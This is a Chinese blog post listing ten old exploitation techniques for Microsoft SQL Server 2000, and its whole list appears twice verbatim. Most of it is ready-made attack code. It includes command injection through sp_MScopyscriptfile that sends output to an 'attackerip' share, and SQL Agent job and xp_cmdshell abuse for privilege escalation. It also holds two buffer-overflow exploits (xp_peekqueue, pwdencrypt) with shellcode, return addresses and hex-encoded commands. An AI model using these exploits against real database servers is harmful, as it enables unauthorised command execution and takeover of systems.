订阅
防止SQL注入攻击 网络管理员的前景展望
谈解决ARP攻击的方法
老调重弹 Microsoft Sql public利用
作者:admin 日期:2009-11-20
本人注:很老的技术了,大部分是对sql2000的测试,对sql2005不是很有效果
1.
xp_runwebtask msdb.dbo.mswebtasks
可以允许'PUBLIC'权限进行Insert、Update、Delete和Select操作
能够通过SQL SERVER认证的攻击者可以删除、插入或者更新由其他用户建立的WEB任务,另外攻击者可以运行已经建立的WEB任务,利用各种操
作可能以SQL Server Agent service帐户权限执行任意OS命令或者提升权限为SYSADMIN组用户
2.
多个DBCC函数中对用户提交的参数缺少正确的缓冲区边界检查,提交超长字符串作为参数提交给如下存储过程,可导致缓冲区溢出,可能可以
以SQL Server Agent Proxy帐户的进程在系统中执行任意指令:
DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)
DBCC INDEXFRAG ('','XXX...') (b)
DBCC UpdateUSAGE ('','XXX...') (c)
DBCC CHECKCONSTRAINTS ('XXX...') (c)
DBCC SHOWCONTIG ('XXX...') (d)
DBCC CLEANTABLE ('','XXX...') (d)
(a)只有sysadmin fixed server role成员才能运行此命令。
(b)只有sysadmin fixed server role, db_owner或者db_ddladmin fixed database role能运行此命令。
(c)只有sysadmin fixed server role或者db_owner fixed database role能运行此命令。
(d)所有用户可以运行此命令。
3.
Microsoft SQL Server中的用于复制的存储过程Sp_MScopyscriptfile对用户提交的参数缺少正确的过滤,远程攻击者可以利用这个漏洞以SQL
Server Agent Proxy帐户权限在系统上执行任意命令。
Sp_MScopyscriptfile存储过程可以在SQL服务器复制目录中建立目录,然后拷贝脚本到此木中,这个存储过程包含@scriptfile输入参数,用于
要拷贝脚本文件的名称,Sp_MScopyscriptfile存储过程对这个外部提供的参数缺少正确的过滤,远程攻击者可以在这个参数中插入操作系统命
令并通过xp_cmdshell执行,如果SQL Server Agent Proxy帐户在系统中存储的情况下,攻击者可以以SQL Server Agent Proxy帐户的权限在系
统中执行任意命令,不过默认SQL Server Agent Proxy帐户需要SQL管理员权限激活。
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ >
"\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' +
@command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''
4.
Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit
http://hi.baidu.com/hack_forensic/blog/item/be1ea0142951b75bf3de32d9.html
5.
sp_add_job、sp_add_job_step
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
6.
USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'
7.
xp_execresultset xp_printstatements xp_displayparamstmt
exec xp_displayparamstmt N'exec master..xp_cmdshell ''dir > c:\esp-results.txt''',N'master',1
8.
xp_peekqueue
declare @query varchar(4000) declare @end_query varchar(500) declare @short_jump varchar(8)
declare @sra varchar(8) declare @call_eax varchar(4) declare @WinExec varchar(8) declare @mov varchar(4)
declare @ExitThread varchar(8)
declare @exploit_code varchar(200)
declare @command varchar(300)
declare @msver nvarchar (200)
declare @ver int
declare @sp nvarchar (20)
select @command =
0x636D642E657865202F6320646972203E20633A5C707764656E63727970742E747874202600
00
select @sp = N'Service Pack '
select @msver = @@version
select @ver = ascii(substring(reverse(@msver),3,1))
if @ver = 53
print @sp + char(@ver) -- Windows 2000 SP5 For when it comes out. else if @ver = 52
print @sp + char(@ver) -- Windows 2000 SP4 For when it comes out. else if @ver = 51
print @sp + char(@ver) -- Windows 2000 SP3 For when it comes out.
else if @ver = 50 -- Windows 2000 Service Pack 2
BEGIN
END
print @sp + char(@ver)
select @sra = 0x43E5E677
select @WinExec = 0xAFA7E977
select @ExitThread = 0xE275E877
else if @ver = 49 -- Windows 2000 Service Pack 1
BEGIN
END
select @sra = 0x00000000 --need to get address select @WinExec = 0x00000000 --need to get address select @ExitThread =
0x00000000 --need to get address
else -- No Windows 2000 Service Pack
BEGIN
END
select @sra = 0x00000000 --need to get address
select @WinExec = 0x00000000 --need to get address select @ExitThread = 0x00000000 --need to get address
select @query = 'exec xp_peekqueue
''1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLL
LLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ'
select @end_query = ''',''a'',''a'''
select @short_jump = 0xEB0A9090
select @mov = 0xB8
select @exploit_code = 0x90909090909090909090558BEC33C0508D432A50B8
select @call_eax = 0xFFD0
select @query = @query + @short_jump + @sra + @exploit_code + @WinExec + @call_eax +
@mov + @ExitThread + @call_eax + @command + @end_query exec (@query)
9.OPENROWSET
Select * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver',
'SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')
10.pwdencrypt
declare @msver nvarchar (200)
declare @ver int
declare @sp nvarchar (20)
declare @call_eax nvarchar(8) declare @exploit nvarchar(2000) declare @padding nvarchar(200)
declare @exploit_code nvarchar(1000)
declare @sra nvarchar(8)
declare @short_jump nvarchar(8)
declare @a_bit_more_pad nvarchar (16)
declare @WinExec nvarchar(16)
declare @command nvarchar(300)
select @command =
0x636D642E657865202F6320646972203E20633A5C707764656E63727970742E747874000000
00
select @sp = N'Service Pack '
select @msver = @@version
select @ver = ascii(substring(reverse(@msver),3,1))
if @ver = 53
print @sp + char(@ver) -- Windows 2000 SP5 For when it comes out. else if @ver = 52
print @sp + char(@ver) -- Windows 2000 SP4 For when it comes out. else if @ver = 51
print @sp + char(@ver) -- Windows 2000 SP3 For when it comes out.
else if @ver = 50 -- Windows 2000 Service Pack 2
BEGIN
END
print @sp + char(@ver)
select @sra = 0x2B49E277
select @WinExec = 0xAFA7E977
else if @ver = 49 -- Windows 2000 Service Pack 1
BEGIN
print @sp + char(@ver)
select @sra = 0x00000000 -- Need to get address select @WinExec = 0x00000000 -- Need to get address
END
else -- No Windows 2000 Service Pack
BEGIN
END
print @sp + char(@ver)
select @sra = 0x00000000 -- Need to get address
select @WinExec = 0x00000000 -- Need to get address
select @short_jump = 0xEB0A9090
select @padding = N'NGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirr
eLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirr eLNGSSQuirreL*'
select @a_bit_more_pad = 0x6000600060006000
select @exploit_code = 0x90558BEC33C0508D452450B8
select @call_eax = 0xFFD0FFD0
select @exploit = @padding + @sra + @short_jump + @a_bit_more_pad + @exploit_code +
@WinExec + @call_eax +@command select pwdencrypt(@exploit)
1.
xp_runwebtask msdb.dbo.mswebtasks
可以允许'PUBLIC'权限进行Insert、Update、Delete和Select操作
能够通过SQL SERVER认证的攻击者可以删除、插入或者更新由其他用户建立的WEB任务,另外攻击者可以运行已经建立的WEB任务,利用各种操
作可能以SQL Server Agent service帐户权限执行任意OS命令或者提升权限为SYSADMIN组用户
2.
多个DBCC函数中对用户提交的参数缺少正确的缓冲区边界检查,提交超长字符串作为参数提交给如下存储过程,可导致缓冲区溢出,可能可以
以SQL Server Agent Proxy帐户的进程在系统中执行任意指令:
DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)
DBCC INDEXFRAG ('','XXX...') (b)
DBCC UpdateUSAGE ('','XXX...') (c)
DBCC CHECKCONSTRAINTS ('XXX...') (c)
DBCC SHOWCONTIG ('XXX...') (d)
DBCC CLEANTABLE ('','XXX...') (d)
(a)只有sysadmin fixed server role成员才能运行此命令。
(b)只有sysadmin fixed server role, db_owner或者db_ddladmin fixed database role能运行此命令。
(c)只有sysadmin fixed server role或者db_owner fixed database role能运行此命令。
(d)所有用户可以运行此命令。
3.
Microsoft SQL Server中的用于复制的存储过程Sp_MScopyscriptfile对用户提交的参数缺少正确的过滤,远程攻击者可以利用这个漏洞以SQL
Server Agent Proxy帐户权限在系统上执行任意命令。
Sp_MScopyscriptfile存储过程可以在SQL服务器复制目录中建立目录,然后拷贝脚本到此木中,这个存储过程包含@scriptfile输入参数,用于
要拷贝脚本文件的名称,Sp_MScopyscriptfile存储过程对这个外部提供的参数缺少正确的过滤,远程攻击者可以在这个参数中插入操作系统命
令并通过xp_cmdshell执行,如果SQL Server Agent Proxy帐户在系统中存储的情况下,攻击者可以以SQL Server Agent Proxy帐户的权限在系
统中执行任意命令,不过默认SQL Server Agent Proxy帐户需要SQL管理员权限激活。
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ >
"\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' +
@command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''
4.
Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit
http://hi.baidu.com/hack_forensic/blog/item/be1ea0142951b75bf3de32d9.html
5.
sp_add_job、sp_add_job_step
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
6.
USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'
7.
xp_execresultset xp_printstatements xp_displayparamstmt
exec xp_displayparamstmt N'exec master..xp_cmdshell ''dir > c:\esp-results.txt''',N'master',1
8.
xp_peekqueue
declare @query varchar(4000) declare @end_query varchar(500) declare @short_jump varchar(8)
declare @sra varchar(8) declare @call_eax varchar(4) declare @WinExec varchar(8) declare @mov varchar(4)
declare @ExitThread varchar(8)
declare @exploit_code varchar(200)
declare @command varchar(300)
declare @msver nvarchar (200)
declare @ver int
declare @sp nvarchar (20)
select @command =
0x636D642E657865202F6320646972203E20633A5C707764656E63727970742E747874202600
00
select @sp = N'Service Pack '
select @msver = @@version
select @ver = ascii(substring(reverse(@msver),3,1))
if @ver = 53
print @sp + char(@ver) -- Windows 2000 SP5 For when it comes out. else if @ver = 52
print @sp + char(@ver) -- Windows 2000 SP4 For when it comes out. else if @ver = 51
print @sp + char(@ver) -- Windows 2000 SP3 For when it comes out.
else if @ver = 50 -- Windows 2000 Service Pack 2
BEGIN
END
print @sp + char(@ver)
select @sra = 0x43E5E677
select @WinExec = 0xAFA7E977
select @ExitThread = 0xE275E877
else if @ver = 49 -- Windows 2000 Service Pack 1
BEGIN
END
select @sra = 0x00000000 --need to get address select @WinExec = 0x00000000 --need to get address select @ExitThread =
0x00000000 --need to get address
else -- No Windows 2000 Service Pack
BEGIN
END
select @sra = 0x00000000 --need to get address
select @WinExec = 0x00000000 --need to get address select @ExitThread = 0x00000000 --need to get address
select @query = 'exec xp_peekqueue
''1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLL
LLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ'
select @end_query = ''',''a'',''a'''
select @short_jump = 0xEB0A9090
select @mov = 0xB8
select @exploit_code = 0x90909090909090909090558BEC33C0508D432A50B8
select @call_eax = 0xFFD0
select @query = @query + @short_jump + @sra + @exploit_code + @WinExec + @call_eax +
@mov + @ExitThread + @call_eax + @command + @end_query exec (@query)
9.OPENROWSET
Select * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver',
'SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')
10.pwdencrypt
declare @msver nvarchar (200)
declare @ver int
declare @sp nvarchar (20)
declare @call_eax nvarchar(8) declare @exploit nvarchar(2000) declare @padding nvarchar(200)
declare @exploit_code nvarchar(1000)
declare @sra nvarchar(8)
declare @short_jump nvarchar(8)
declare @a_bit_more_pad nvarchar (16)
declare @WinExec nvarchar(16)
declare @command nvarchar(300)
select @command =
0x636D642E657865202F6320646972203E20633A5C707764656E63727970742E747874000000
00
select @sp = N'Service Pack '
select @msver = @@version
select @ver = ascii(substring(reverse(@msver),3,1))
if @ver = 53
print @sp + char(@ver) -- Windows 2000 SP5 For when it comes out. else if @ver = 52
print @sp + char(@ver) -- Windows 2000 SP4 For when it comes out. else if @ver = 51
print @sp + char(@ver) -- Windows 2000 SP3 For when it comes out.
else if @ver = 50 -- Windows 2000 Service Pack 2
BEGIN
END
print @sp + char(@ver)
select @sra = 0x2B49E277
select @WinExec = 0xAFA7E977
else if @ver = 49 -- Windows 2000 Service Pack 1
BEGIN
print @sp + char(@ver)
select @sra = 0x00000000 -- Need to get address select @WinExec = 0x00000000 -- Need to get address
END
else -- No Windows 2000 Service Pack
BEGIN
END
print @sp + char(@ver)
select @sra = 0x00000000 -- Need to get address
select @WinExec = 0x00000000 -- Need to get address
select @short_jump = 0xEB0A9090
select @padding = N'NGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirr
eLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirreLNGSSQuirr eLNGSSQuirreL*'
select @a_bit_more_pad = 0x6000600060006000
select @exploit_code = 0x90558BEC33C0508D452450B8
select @call_eax = 0xFFD0FFD0
select @exploit = @padding + @sra + @short_jump + @a_bit_more_pad + @exploit_code +
@WinExec + @call_eax +@command select pwdencrypt(@exploit)
文章来自: 
Tags: 评论: 0 | 查看次数: 5931
